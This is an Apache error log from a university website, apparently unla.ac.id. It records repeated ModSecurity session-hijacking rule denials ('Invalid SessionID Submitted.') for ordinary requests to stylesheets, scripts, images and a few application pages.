[Mon Aug 28 07:12:11.207156 2023] [:error] [pid 37401] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOvmW8Co-f0AAJIZSo8AAAAF"]
[Mon Aug 28 07:12:11.760890 2023] [:error] [pid 37618] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOvmW8Co-f0AAJLyENwAAAAH"]
[Mon Aug 28 07:12:44.561713 2023] [:error] [pid 37539] [client 114.5.216.10] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOvmfMCo-f0AAJKjZUgAAAAG"]
[Mon Aug 28 07:12:55.603615 2023] [:error] [pid 37619] [client 114.5.209.44] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvmh8Co-f0AAJLzWTwAAAAC"]
[Mon Aug 28 07:12:55.735753 2023] [:error] [pid 37401] [client 114.5.209.44] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvmh8Co-f0AAJIZSp4AAAAF"]
[Mon Aug 28 07:16:52.199885 2023] [:error] [pid 37619] [client 103.139.10.118] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOvndMCo-f0AAJLzWXMAAAAC"]
[Mon Aug 28 07:16:52.199975 2023] [:error] [pid 37758] [client 103.139.10.118] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvndMCo-f0AAJN@71gAAAAE"]
[Mon Aug 28 07:16:52.515543 2023] [:error] [pid 37401] [client 103.139.10.118] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvndMCo-f0AAJIZStUAAAAF"]
[Mon Aug 28 07:16:52.578910 2023] [:error] [pid 37313] [client 103.139.10.118] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOvndMCo-f0AAJHB49sAAAAD"]
[Mon Aug 28 07:16:52.593028 2023] [:error] [pid 37721] [client 103.139.10.118] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOvndMCo-f0AAJNZd@sAAAAJ"]
[Mon Aug 28 07:17:00.800463 2023] [:error] [pid 37451] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOvnfMCo-f0AAJJLqZoAAAAA"]
[Mon Aug 28 07:17:00.805431 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOvnfMCo-f0AAJIZStcAAAAF"]
[Mon Aug 28 07:17:00.878762 2023] [:error] [pid 37721] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOvnfMCo-f0AAJNZd@0AAAAJ"]
[Mon Aug 28 07:17:00.879154 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOvnfMCo-f0AAJN@71kAAAAE"]
[Mon Aug 28 07:17:00.879267 2023] [:error] [pid 37451] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOvnfMCo-f0AAJJLqZsAAAAA"]
[Mon Aug 28 07:17:00.879385 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOvnfMCo-f0AAJLyEXoAAAAH"]
[Mon Aug 28 07:17:00.884702 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOvnfMCo-f0AAJLwX00AAAAB"]
[Mon Aug 28 07:17:00.884873 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOvnfMCo-f0AAJIZStgAAAAF"]
[Mon Aug 28 07:17:00.923190 2023] [:error] [pid 37619] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOvnfMCo-f0AAJLzWXUAAAAC"]
[Mon Aug 28 07:17:00.923541 2023] [:error] [pid 37312] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOvnfMCo-f0AAJHAlDwAAAAY"]
[Mon Aug 28 07:17:00.923729 2023] [:error] [pid 37721] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOvnfMCo-f0AAJNZd@4AAAAJ"]
[Mon Aug 28 07:17:00.926428 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOvnfMCo-f0AAJN@71oAAAAE"]
[Mon Aug 28 07:17:00.926529 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOvnfMCo-f0AAJIZStkAAAAF"]
[Mon Aug 28 07:17:00.926806 2023] [:error] [pid 37759] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOvnfMCo-f0AAJN-mxcAAAAI"]
[Mon Aug 28 07:17:00.952169 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOvnfMCo-f0AAJLwX04AAAAB"]
[Mon Aug 28 07:17:00.952190 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOvnfMCo-f0AAJLyEXsAAAAH"]
[Mon Aug 28 07:17:00.953291 2023] [:error] [pid 37759] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOvnfMCo-f0AAJN-mxgAAAAI"]
[Mon Aug 28 07:17:00.955099 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOvnfMCo-f0AAJIZStoAAAAF"]
[Mon Aug 28 07:17:00.958788 2023] [:error] [pid 37619] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOvnfMCo-f0AAJLzWXYAAAAC"]
[Mon Aug 28 07:17:00.960008 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOvnfMCo-f0AAJN@71sAAAAE"]
[Mon Aug 28 07:17:00.982139 2023] [:error] [pid 37721] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOvnfMCo-f0AAJNZd@8AAAAJ"]
[Mon Aug 28 07:17:01.074626 2023] [:error] [pid 37759] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOvnfcCo-f0AAJN-mxkAAAAI"]
[Mon Aug 28 07:17:01.077355 2023] [:error] [pid 37451] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOvnfcCo-f0AAJJLqZwAAAAA"]
[Mon Aug 28 07:17:01.077512 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOvnfcCo-f0AAJIZStsAAAAF"]
[Mon Aug 28 07:17:01.115812 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOvnfcCo-f0AAJLyEXwAAAAH"]
[Mon Aug 28 07:17:01.119137 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOvnfcCo-f0AAJLwX08AAAAB"]
[Mon Aug 28 07:17:01.121555 2023] [:error] [pid 37759] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOvnfcCo-f0AAJN-mxoAAAAI"]
[Mon Aug 28 07:17:01.164546 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOvnfcCo-f0AAJIZStwAAAAF"]
[Mon Aug 28 07:17:01.165219 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOvnfcCo-f0AAJN@71wAAAAE"]
[Mon Aug 28 07:17:01.165274 2023] [:error] [pid 37759] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOvnfcCo-f0AAJN-mxsAAAAI"]
[Mon Aug 28 07:17:01.201374 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOvnfcCo-f0AAJLwX1AAAAAB"]
[Mon Aug 28 07:17:01.202854 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOvnfcCo-f0AAJIZSt0AAAAF"]
[Mon Aug 28 07:17:01.202925 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOvnfcCo-f0AAJLyEX0AAAAH"]
[Mon Aug 28 07:17:01.239073 2023] [:error] [pid 37451] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOvnfcCo-f0AAJJLqZ0AAAAA"]
[Mon Aug 28 07:17:01.239642 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOvnfcCo-f0AAJLyEX4AAAAH"]
[Mon Aug 28 07:17:01.276642 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOvnfcCo-f0AAJLwX1EAAAAB"]
[Mon Aug 28 07:17:01.278359 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOvnfcCo-f0AAJIZSt4AAAAF"]
[Mon Aug 28 07:17:01.311038 2023] [:error] [pid 37721] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOvnfcCo-f0AAJNZd-AAAAAJ"]
[Mon Aug 28 07:17:01.490932 2023] [:error] [pid 37619] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOvnfcCo-f0AAJLzWXcAAAAC"]
[Mon Aug 28 07:17:01.492412 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOvnfcCo-f0AAJN@710AAAAE"]
[Mon Aug 28 07:17:01.544100 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/no-profile-image.jpg"] [unique_id "ZOvnfcCo-f0AAJIZSt8AAAAF"]
[Mon Aug 28 07:17:01.551722 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/deny_haspada.jpg"] [unique_id "ZOvnfcCo-f0AAJLyEX8AAAAH"]
[Mon Aug 28 07:17:01.557649 2023] [:error] [pid 37539] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOvnfcCo-f0AAJKjZYQAAAAG"]
[Mon Aug 28 07:17:01.696480 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/Msn-Buddy-web-icon.png"] [unique_id "ZOvnfcCo-f0AAJN@714AAAAE"]
[Mon Aug 28 07:17:01.699004 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOvnfcCo-f0AAJLwX1IAAAAB"]
[Mon Aug 28 07:17:01.711711 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/Pas_Foto.jpg"] [unique_id "ZOvnfcCo-f0AAJIZSuAAAAAF"]
[Mon Aug 28 07:17:01.740710 2023] [:error] [pid 37619] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/IMG_20160613_100811.jpg"] [unique_id "ZOvnfcCo-f0AAJLzWXgAAAAC"]
[Mon Aug 28 07:17:01.747610 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOvnfcCo-f0AAJLyEYAAAAAH"]
[Mon Aug 28 07:17:01.793045 2023] [:error] [pid 37539] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOvnfcCo-f0AAJKjZYUAAAAG"]
[Mon Aug 28 07:17:01.835173 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOvnfcCo-f0AAJLyEYEAAAAH"]
[Mon Aug 28 07:17:01.874384 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOvnfcCo-f0AAJN@718AAAAE"]
